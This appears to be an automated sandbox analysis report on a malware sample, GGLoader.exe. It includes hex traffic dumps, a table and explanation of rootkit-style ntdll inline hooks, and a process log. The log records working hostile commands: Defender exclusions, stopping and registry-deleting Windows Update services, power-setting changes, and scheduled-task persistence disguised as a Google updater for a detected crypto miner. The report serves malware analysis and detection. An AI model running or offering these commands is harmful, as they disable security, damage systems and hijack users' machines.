                                                                                                  2024-10-04 17:13:22 UTC11271INData Raw: 39 e7 0f 85 f5 fe ff ff 45 85 ed 0f 84 ec fe ff ff 41 c6 04 24 30 49 83 c4 01 e9 de fe ff ff 41 83 e2 40 4c 89 e6 0f 84 50 ff ff ff 48 83 c6 01 41 c6 04 24 20 e9 42 ff ff ff 0f 1f 44 00 00 41 83 eb 01 45 85 ed 44 89 5b 0c 0f 89 da fe ff ff 44 89 d0 25 00 06 00 00 3d 00 02 00 00 0f 85 c7 fe ff ff 8b 53 0c 8d 42 ff 85 d2 89 43 0c 0f 8e eb fe ff ff 89 c1 4c 89 e0 49 8d 54 0c 01 90 48 83 c0 01 c6 40 ff 30 48 39 d0 75 f3 4d 8d 64 0c 01 c7 43 0c ff ff ff ff e9 c2 fe ff ff 66 90 57 56 53 48 83 ec 20 4c 89 ce 49 89 d2 45 8d 48 ff 41 b8 67 66 66 66 44 89 c8 49 63 d9 41 c1 f9 1f 41 f7 e8 41 89 d0 41 c1 f8 02 45 29 c8 41 b9 01 00 00 00 74 23 41 bb 67 66 66 66 0f 1f 40 00 44 89 c0 41 c1 f8 1f 41 83 c1 01 41 f7 eb c1 fa 02 44 29 c2 41 89 d0 75 e7 8b 46 2c 83 f8 ff 75
                                                                                                  Data Ascii: 9EA$0IA@LPHA$ BDAED[D%=SBCLITH@0H9uMdCfWVSH LIEHAgfffDIcAAAAE)At#Agfff@DAAAD)AuF,u
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: f7 ff ff 66 0f 2e c6 48 8b 44 24 40 48 89 ca 7a 06 0f 84 36 04 00 00 41 8d 4b 01 41 b8 10 00 00 00 eb 08 0f 1f 44 00 00 4c 89 ca 80 7a ff 30 4c 8d 4a ff 74 f3 48 89 54 24 40 89 4c 24 2c e9 a4 f6 ff ff 44 8b 4c 24 38 48 89 f0 89 5c 24 50 4c 8d 70 01 48 89 74 24 30 48 8b b4 24 f8 00 00 00 4c 89 f3 45 85 c9 0f 84 f0 01 00 00 41 83 7f 14 01 0f 8e 63 03 00 00 83 7c 24 38 02 0f 84 21 02 00 00 48 8b 5c 24 30 eb 49 41 88 7e ff 45 31 c0 4c 89 e1 ba 0a 00 00 00 e8 cb 07 00 00 4d 39 e5 4c 89 f9 ba 0a 00 00 00 4c 0f 44 e8 45 31 c0 48 89 c3 e8 b1 07 00 00 48 89 ea 49 89 dc 48 89 c1 49 89 c7 4c 89 f3 e8 cd eb ff ff 49 83 c6 01 8d 78 30 4c 89 e2 48 89 e9 e8 2b 0c 00 00 85 c0 7f a8 83 ff 39 48 89 5c 24 30 4c 89 f3 0f 84 c2 01 00 00 4d 89 ee 83 c7 01 4d 89 e5 41 b8 20 00
                                                                                                  Data Ascii: f.HD$@Hz6AKADLz0LJtHT$@L$,DL$8H\$PLpHt$0H$LEAc|$8!H\$0IA~E1LM9LLDE1HHIHILIx0LH+9H\$0LMMA
                                                                                                  2024-10-04 17:13:22 UTC8768INData Raw: d4 79 12 71 22 49 13 00 43 f9 b6 e9 8d 23 56 9d f0 79 2e 71 13 49 78 00 0a f9 94 e9 bd 23 60 9d f0 79 20 71 35 49 21 00 09 f9 be e9 8f 23 15 9d f5 79 2d 71 3d 49 26 00 0e f9 81 e9 82 23 54 9d ac 79 20 71 0b 49 2e 00 2f f9 d6 e9 db 23 4e 9d d3 79 09 71 01 49 3e 00 0e f9 b1 e9 85 23 6b 9d ea 79 48 71 0b 49 19 00 4f f9 ad e9 d0 23 7a 9d e5 79 38 71 17 49 2f 00 19 f9 92 e9 db 23 51 9d f5 79 32 71 21 49 28 00 10 f9 bf e9 ae 23 11 9d af 79 3c 71 13 49 0a 00 4e f9 9c e9 be 23 4b 9d d3 79 23 71 25 49 13 00 4c f9 94 e9 81 23 7b 9d d6 79 37 71 22 49 38 00 0a f9 be e9 da 23 5a 9d e4 79 2a 71 40 49 38 00 4c f9 8e e9 b9 23 44 9d ec 79 01 71 25 49 2f 00 19 f9 9b e9 c6 23 10 9d d9 79 3c 71 30 49 7c 00 2c f9 88 e9 b1 23 6a 9d a5 79 2f 71 1b 49 3f 00 2e f9 ab e9 d8 23 60
                                                                                                  Data Ascii: yq"IC#Vy.qIx#`y q5I!#y-q=I&#Ty qI./#NyqI>#kyHqIO#zy8qI/#Qy2q!I(#y<qIN#Ky#q%IL#{y7q"I8#Zy*q@I8L#Dyq%I/#y<q0I|,#jy/qI?.#`
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 00 00 00
                                                                                                  Data Ascii: <
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 62 7e 6e 49 e8 6c 70 66 77 76 4b 6a 6a 63 64 71 6e 68 6f 0a 56 6f 76 63 4d 51 78 74 6f 54 73 01 65 6d 69 63 12 44 7a 66 61 79 4b 6b 6a 63 64 71 6f 68 6e 65 7d 47 53 69 65 7f 06 57 65 78 7f 61 62 13 4a 69 68 66 67 70 73 79 4b 72 6a 63 64 4f 68 68 6d 0a 56 6f 76 63 4d 51 78 74 6f 54 73 01 65 6d 69 63 12 7d 7a 4e 47 73 63 69 42 6b 62 62 60 6a 6c 65 7e 78 60 7b 6f 5d 69 74 65 7e 59 4a 79 66 17 4a 68 6c 7a 4e 45 73 63 69 47 49 73 69 70 59 67 74 77 6f 5e 4b 65 75 72 65 6c 50 7f 72 68 67 41 4b 68 6c 7a 18 42 73 63 69 14 40 62 62 6c 51 75 74 75 69 5b 6f 16 78 78 74 6f 02 5d 78 68 6d 63 73 46 68 6f 16 4a 71 7c 2b 79 6f 73 6e 4e 71 67 74 73 7c 7b 78 69 f8 61 74 65 79 63 63 65 7c 65 41 4f 6c 70 6c 70 7e 72 6f 42 4b 62 62 6c 68 6a 65 79 47 7c 69 65 7f 21 65 6e 50 5c
                                                                                                  Data Ascii: b~nIlpfwvKjjcdqnhoVovcMQxtoTsemicDzfayKkjcdqohne}GSieWexabJihfgpsyKrjcdOhhmVovcMQxtoTsemic}zNGsciBkbb`jle~x`{o]ite~YJyfJhlzNEsciGIsipYgtwo^KeurelPrhgAKhlzBsci@bblQutui[oxxto]xhmcsFhoJq|+yosnNqgts|{xiateycce|eAOlplp~roBKbblhjeyG|ie!enP\
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: 70 75 b7 e0 53 65 68 b3 42 76 c0 58 34 f5 76 ee 9c b3 19 35 7f 29 3c 59 10 d0 59 d4 7f 9f 7e 64 6c 19 85 d3 ba 45 72 e2 98 fc c3 9d 7b 8c b6 7d c1 68 6c 61 fb ca df b5 32 8d f1 41 51 12 94 7a 78 8b 79 33 ea b2 27 4a 54 da 75 b8 b0 a0 89 e5 e8 ba a3 11 98 13 36 a2 49 b4 a0 c4 8f 3c 28 e8 72 e1 6a d3 d6 e0 6f dc 8e 58 d8 b5 4e 25 8f 57 94 31 5d f3 8e 06 6f 7a 40 ee 54 a8 66 fd fb 44 cc 19 25 fd c8 bb ab e2 db fd 6b 2d 87 37 c2 34 cf df dd ad b1 3f 31 6d 8f 92 79 dd 7d 04 18 a0 25 7f bf 5d 54 7c 65 9a 6b dc 70 e8 43 f3 e6 e0 eb 6d b9 17 9f e5 97 0d 2a 57 3e bd 26 37 4d db ee 52 82 cb c3 4c b9 b1 63 1d d5 bc 95 61 53 0b a7 57 56 6d a2 c2 5d ef c4 50 9c 54 f3 6f 39 6e 39 dd 33 2c 18 be 13 52 28 54 ab 07 3b b4 b0 60 f5 d5 b6 d0 10 f7 33 f6 e0 c9 59 1d b7 b3 35
                                                                                                  Data Ascii: puSehBvX4v5)<YY~dlEr{}hla2AQzxy3'JTu6I<(rjoXN%W1]oz@TfD%k-74?1my}%]T|ekpCm*W>&7MRLcaSWVm]PTo9n93,R(T;`3Y5
                                                                                                  2024-10-04 17:13:22 UTC16384INData Raw: e5 16 33 ce 1c a5 cd b4 2e e8 64 08 66 c5 c2 a8 e9 b1 4d ac a6 93 e3 f4 3b b1 bd e0 fa 8f af 5a b0 03 f9 b7 04 6c 85 6c 2e ff cc a1 d3 e6 32 3f 0f d3 24 f4 a8 09 b3 9d b0 91 33 f3 3a 8c c7 4f 82 31 9a d4 85 d9 71 e8 2b 53 c4 1d c3 db bd bc 8e 75 b4 ef 3a 09 f5 af 32 e3 8b 7a f8 18 f8 83 f4 af b8 25 8e 91 e4 a9 f8 f6 3e fe 01 51 d7 83 3e c8 08 f9 e6 88 99 ca 86 71 eb 4a 59 77 33 40 58 bc 51 09 b2 0f 15 7e bb f9 8a 40 2a 94 f1 79 12 bb d2 4a f8 a9 d0 bf b2 1a 40 1b 7e 98 2a 4b 69 d4 a4 81 e9 86 b4 93 7d b9 82 e8 de 45 f8 8f ca 22 ae 18 c6 0f 29 bc b9 a6 29 fc 5c 91 34 cf 8c 3e 7e af 5f a7 e3 5d ee 13 6a e1 c9 5d 91 2a ba 90 b0 b0 20 6f cd c3 97 df 06 25 54 cb 97 e7 51 07 db 66 f3 8e ef 6b 29 bc 55 22 02 87 26 4d bd 90 d8 40 9d be 1f c2 79 0c fe 08 d7 e1 3b
                                                                                                  Data Ascii: 3.dfM;Zll.2?$3:O1q+Su:2z%>Q>qJYw3@XQ~@*yJ@~*Ki}E"))\4>~_]j]* o%TQfk)U"&M@y;


                                                                                                  Code Manipulations

Function Name                      Hook Type   Active in Processes
ZwEnumerateKey                     INLINE      explorer.exe, winlogon.exe
NtQuerySystemInformation           INLINE      explorer.exe, winlogon.exe
ZwResumeThread                     INLINE      explorer.exe, winlogon.exe
NtDeviceIoControlFile              INLINE      explorer.exe, winlogon.exe
ZwDeviceIoControlFile              INLINE      explorer.exe, winlogon.exe
NtEnumerateKey                     INLINE      explorer.exe, winlogon.exe
NtQueryDirectoryFile               INLINE      explorer.exe, winlogon.exe
ZwEnumerateValueKey                INLINE      explorer.exe, winlogon.exe
ZwQuerySystemInformation           INLINE      explorer.exe, winlogon.exe
NtResumeThread                     INLINE      explorer.exe, winlogon.exe
RtlGetNativeSystemInformation      INLINE      explorer.exe, winlogon.exe
NtQueryDirectoryFileEx             INLINE      explorer.exe, winlogon.exe
NtEnumerateValueKey                INLINE      explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx             INLINE      explorer.exe, winlogon.exe
ZwQueryDirectoryFile               INLINE      explorer.exe, winlogon.exe

The hooked exports are the native primitives that directory listings (NtQueryDirectoryFile, NtQueryDirectoryFileEx), registry enumeration (NtEnumerateKey, NtEnumerateValueKey) and process listings (NtQuerySystemInformation) are built on; a hook placed there inside explorer.exe and winlogon.exe can filter what every Win32 caller in those processes gets to see. In every patched prologue below, 0xE9 is the x86-64 opcode for a near JMP rel32: the next four bytes are the little-endian signed displacement from the end of the 5-byte instruction to the hook handler, and the sixth byte shown lies outside that instruction. Exports with identical bytes jump to the same handler; for the Nt/Zw pairs (for example NtEnumerateKey and ZwEnumerateKey) this is expected, since both names resolve to the same stub in ntdll.dll.

Function Name                      Hook Type   New Data (first bytes at the function entry)
ZwEnumerateKey                     INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation           INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                     INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile              INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile              INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                     INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile               INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey                INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation           INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                     INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation      INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx             INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey                INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx             INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile               INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF

(The report lists this New Data table a second time with identical entries.)


                                                                                                  Target ID:0
                                                                                                  Start time:13:13:11
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Users\user\Desktop\GGLoader.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\GGLoader.exe"
                                                                                                  Imagebase:0xfd0000
                                                                                                  File size:19'456 bytes
                                                                                                  MD5 hash:982E4AE4559538CFB529DFAFF0507880
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:13:13:12
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:13:13:12
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:13:13:14
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:13:13:14
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

Target ID: 6
Start time: 13:13:22
Start date: 04/10/2024
Path: C:\Users\user\AppData\Local\Temp\LicCheck.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
Imagebase: 0x790000
File size: 293'888 bytes
MD5 hash: 726A5B76F4C40551741FFDDA14088CE3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 79%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 13:13:22
Start date: 04/10/2024
Path: C:\Users\user\AppData\Local\Temp\LicSend.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\LicSend.exe"
Imagebase: 0x7ff7d3b90000
File size: 2'330'112 bytes
MD5 hash: 4648D5EF582C7B17D9712F5B5B60F046
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 79%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 9
Start time: 13:13:28
Start date: 04/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 13:13:28
Start date: 04/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase: 0x7ff6a9b50000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase: 0x7ff6a9b50000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc stop UsoSvc
Imagebase: 0x7ff7c55d0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 13:13:33
Start date: 04/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: powercfg /x -hibernate-timeout-ac 0
Imagebase: 0x7ff7e34d0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 13:13:34
Start date: 04/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: powercfg /x -hibernate-timeout-dc 0
Imagebase: 0x7ff7e34d0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 13:13:34
Start date: 04/10/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc stop WaaSMedicSvc
Imagebase: 0x7ff7c55d0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 13:13:34
Start date: 04/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: powercfg /x -standby-timeout-ac 0
Imagebase: 0x7ff7e34d0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 13:13:34
Start date: 04/10/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc stop wuauserv
Imagebase: 0x7ff7c55d0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 13:13:35
Start date: 04/10/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: powercfg /x -standby-timeout-dc 0
Imagebase: 0x7ff7e34d0000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 13:13:35
Start date: 04/10/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc stop bits
Imagebase: 0x7ff7c55d0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 13:13:35
Start date: 04/10/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc stop dosvc
Imagebase: 0x7ff7c55d0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                  Target ID:28
                                                                                                  Start time:13:13:36
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:29
                                                                                                  Start time:13:13:37
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:30
                                                                                                  Start time:13:13:37
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:31
                                                                                                  Start time:13:13:37
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:32
                                                                                                  Start time:13:13:38
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:33
                                                                                                  Start time:13:13:51
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
